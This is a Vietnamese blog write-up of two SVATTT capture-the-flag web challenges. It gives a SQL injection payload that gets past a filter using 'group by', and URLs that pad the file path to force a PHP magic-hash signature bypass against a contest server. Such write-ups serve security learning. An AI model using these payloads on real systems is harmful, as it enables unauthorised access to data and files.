SVATTT Farm Web200 ( vietlott & readfile return)

Vietlott – web200

Mỗi lần thi xong là một lần ôm đống việc, deadline ơi sao mà nhiều thế, mà thôi cũng không mất nhiều thời gian nên write up một bài biết đâu có tiền 😐
Bài này thực ra chả có gì khó, chỉ cần nhìn filter là biết làm gì rồi, ước gì lúc thi mình nhìn vào nó một tí, thật là sida.
Không chặn group by thì mình dùng group by, ez
payload: your_number=1 group by 1
1
flag: SVATTT{N0_alias_anym0r3}

Readfile Return – web200

Bài này cũng không phải khó, vì thực ra nó cũng y hệt như bài readfile vòng loại, nhưng vì chiến thuật team mình là Full Attack nên mình cũng không làm bài farm nào.
Tư duy bài này là thay vì brute timestamp như readfile trước thì mình sẽ force cái file name thay đổi để xác suất gặp được trường hợp $realsig trở thành dạng magic hash

url = http://128.199.227.110/neutralcamp3/69e2f2d3f5061816f6bdceac32fa9e4e/index.php?filename=./flag.php&sig=0
url = http://128.199.227.110/neutralcamp3/69e2f2d3f5061816f6bdceac32fa9e4e/index.php?filename=.//flag.php&sig=0
url = http://128.199.227.110/neutralcamp3/69e2f2d3f5061816f6bdceac32fa9e4e/index.php?filename=././flag.php&sig=0
url = http://128.199.227.110/neutralcamp3/69e2f2d3f5061816f6bdceac32fa9e4e/index.php?filename=.///./flag.php&sig=0
các Url trên đều như nhau nên lợi dụng điều đó mình sẽ brute được đoạn filename 700 kí tự là vô cùng nhiều trường hợp, xác suất là khá cao để gặp magic hash.

Code một đoan padding như này:
kí tự đầu tiên là “.”
kí tự thứ cuối cùng là “/”
nếu kí tự thứ n là “.” thì kí tự thứ n+1 là “/”
nếu kí tự thứ n là “/” thì kí tự thứ n+1 là “.” hoặc “/”

url = ” http://128.199.227.110/neutralcamp3/69e2f2d3f5061816f6bdceac32fa9e4e/index.php?filename=”+padding+”flag.php&sig=0
Brute ra chắc sẽ có flag, vì không có nhiều thời gian nên mình nói tới đây thôi, khi nào rảnh mình sẽ code và up lên, tất nhiên bây giờ thì mình sẽ không up vì đống deadline trên lớp.

Advertisements

Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Đăng xuất / Thay đổi )

Connecting to %s